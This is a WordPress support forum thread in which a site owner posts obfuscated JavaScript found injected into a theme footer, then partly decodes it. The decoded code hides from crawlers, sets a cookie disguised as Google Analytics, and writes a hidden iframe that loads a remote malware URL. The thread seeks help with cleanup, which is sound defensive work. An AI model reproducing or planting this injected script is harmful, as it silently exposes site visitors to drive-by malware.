Hacked: Injection | addition hidden javascript and hidden links

  • Resolved Rhand

    (@rhand)


    14 years, 2 months ago

    The folowing javascript was found by me today in the footer.php of a WordPress site:

    <ad><script language=javascript>var i8WyR='%3c'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%20'+'%6c'+'%61'+'%6e'+'%67'+'%75'+'%61'+'%67'+'%65'+'%3d'+'%27'+'%6a'+'%61'+'%76'+'%61'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%27'+'%3e'+'%64'+'%6f'+'%63'+'%75'+'%6d'+'%65'+'%6e'+'%74'+'%2e'+'%77'+'%72'+'%69'+'%74'+'%65'+'%28'+'%75'+'%6e'+'%65'+'%73'+'%63'+'%61'+'%70'+'%65'+'%28'+'%27'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%30'+'%25'+'%36'+'%63'+'%25'+'%36'+'%31'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%35'+'%25'+'%36'+'%31'+'%25'+'%36'+'%37'+'%25'+'%36'+'%35'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%36'+'%61'+'%25'+'%36'+'%31'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%37'+'%25'+'%33'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%33'+'%25'+'%37'+'%34'+'%25'+'%36'+'%39'+'%25'+'%36'+'%66'+'%25'+'%36'+'%65'+'%25'+'%32'+'%30'+'%25'+'%34'+'%36'+'%25'+'%34'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%39'+'%25'+'%37'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%33'+'%64'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%33'+'%30'+'%25'+'%32'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%32'+'%37'+'%25'+'%33'+'%62'+'%25'+'%36'+'%36'+'%25'+'%36'+'%66'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%33'+'%64'+'%25'+'%33'+'%30'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%32'+'%62'+'%25'+'%32'+'%62'+'%25'+'%32'+'%39'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%62'+'%25'+'%33'+'%64'+'%25'+'%35'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%32'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%32'+'%25'+'%36'+'%66'+'%25'+'%36'+'%64'+'%25'+'%34'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%34'+'%31'+'%25'+'%37'+'%34'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%32'+'%39'+'%25'+'%32'+'%64'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%63'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%36'+'%34'+'%25'+'%36'+'%66'+'%25'+'%36'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%64'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%37'+'%34'+'%25'+'%32'+'%65'+'%25'+'%37'+'%37'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%64'+'%25'+'%33'+'%63'+'%25'+'%32'+'%66'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%33'+'%65'+'%27'+'%29'+'%29'+'%3b'+'%3c'+'%2f'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%3e';for(i=0;i<i8WyR.length+2;i=i+3)document.write(unescape(i8WyR.substr(i,3)));FE('%264Dtdsjqu%2631mbohvbhf%264E%2633kbwbtdsjqu%2633%264Fjg%2639epdvnfou/dppljf/joefyPg%2639%2633vsdijot%2633%263%3A%264E%264E.2%2631%2637%2637%2631%2632xjoepx/obwjhbups/vtfsBhfou/upMpxfsDbtf%2639%263%3A/nbudi%26390%2639dsbxmfs%268Ddvjmm/dpn%268Dtubdlsbncmfs%268Dbqpsu%268Dzboefy%268Dcjoh%268Dbtl%268Dhpphmfcpu%268Dntocpu%268Dzbipp%268Dtfbsdi%268Djoefyfs%263%3A0%263%3A%263%3A%2631%268C%2631qsf%264Eofx%2631Ebuf%2639%263%3A%264Cqsf/tfuUjnf%2639qsf/hfuUjnf%2639%263%3A%2C91111111%263%3A%264Cepdvnfou/dppljf%264E%2633vsdijot%264E%2633%2Cftdbqf%2639%2633hpphmf.bobmzujdt/dpn%2633%263%3A%2C%2633%264Cfyqjsft%264E%2633%2Cqsf/upHNUTusjoh%2639%263%3A%2C%2633%264Cqbui%264E0%2633%264Cepu%2631%264E%2631%2638bnf%2638%264C%2631upe%2631%264E%2631%2638jgs%2638%264Cepdvnfou/xsjuf%2639%2633%264D%2633%2Cupe%2Cepu%2C%2633%2631ifj%2633%2C%2633hiu%264E3%2631c%2633%2C%2633ps%2633%2C%2633efs%264E1%2631tsd%2633%2C%2633%264E%2638i%2633%2C%2633uu%2633%2C%2633q%264B005v%2633%2C%2633sb/v%2633%2C%2633t0jo%2633%2C%2633/d%2633%2C%2633hj%264G8%2638%2631xje%2633%2C%2633ui%264E%2633%2C%26335%2631gsb%2633%2C%2633nfcpse%2633%2C%2633fs%264E1%264F%264D0%2633%2Cupe%2Cepu%2C%2633%264F%2633%263%3A%264C%268E%264D0tdsjqu%264F1')</ defused just in case script><!--aSsxfjb--></ad>

    Somehow this code was injected (closing tag was adjusted by me just in case). The file was adjusted on 22-01-2010. So I am worried that the hacker was somehow able to overwrite the theme’s footer file and maybe more.
    Does anybody know what the script does?
    Furthermore I found three hidden links. I will remove all and do all necessary updates as well do a check of all other files and database. I hope it is all not too severe…

    PS It is WordPress 2.8.4

Viewing 8 replies - 1 through 8 (of 8 total)
  • Jyn

    (@jynmeyer)

    14 years, 2 months ago

    Im looking into my own site now… I seem to have a lot of hack attempts and I cant access the front of my blog unless I log in O.o- no one else seem to be either

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    In the DOM inspector I could only make a smal part clearer:

    if(document.cookie.indexOf("urchins")==-1 && !window.navigator.userAgent.toLowerCase().match(/(crawler|cuill.com|stackrambler|aport|yandex|bing|ask|googlebot|msnbot|yahoo|search|indexer)/)) { pre=new Date();pre.setTime(pre.getTime()+80000000);document.cookie="urchins="+escape("google-analytics.com")+";expires="+pre.toGMTString()+";path=/";dot = 'ame'; tod = 'ifr';document.write("<"+tod+dot+" hei"+"ght=2 b"+"or"+"der=0 src"+"='h"+"tt"+"p://4u"+"ra.u"+"s/in"+".c"+"gi?7' wid"+"th="+"4 fra"+"mebord"+"er=0></"+tod+dot+">");}

    Now I need to understand it better..

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    It seems to be hack that happened last year on the old server that got compromised. FTP pw has been adjusted now. Found a newly created folder @ /media/year/month/day/%e3%82%b9%e3%83%86%e3%83%bc%e3%82%b8%e3%83%9e%e3%83%9e/ . Will remove that one as soon as possible as well..

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    One link in the javascript links to a malware domain. It is a redirect link. So that is at least part of the reason for the hack.

    Mark Ratledge

    (@songdogtech)

    14 years, 2 months ago

    FAQ: My site was hacked « WordPress Codex and How to Completely Clean a Hacked WordPress Install

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    @ Songdogtech Thanks for the tips!

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    A lot clear already. Just wonder why this blog has a Media upload field above the post wysiwyg TinyMCE editor instead of only showing it when clicking on a media upload icon to show the media op-up box. I think the media upload field above the post is connected to /media/ which is in the root and contains many images. Maybe that was the old WP media location? Or maybe one used by a plugin?

    Thread Starter Rhand

    (@rhand)

    14 years, 2 months ago

    Never mind that field was generated by the Media Caster plugin. All seems OK.

Viewing 8 replies - 1 through 8 (of 8 total)
  • The topic ‘Hacked: Injection | addition hidden javascript and hidden links’ is closed to new replies.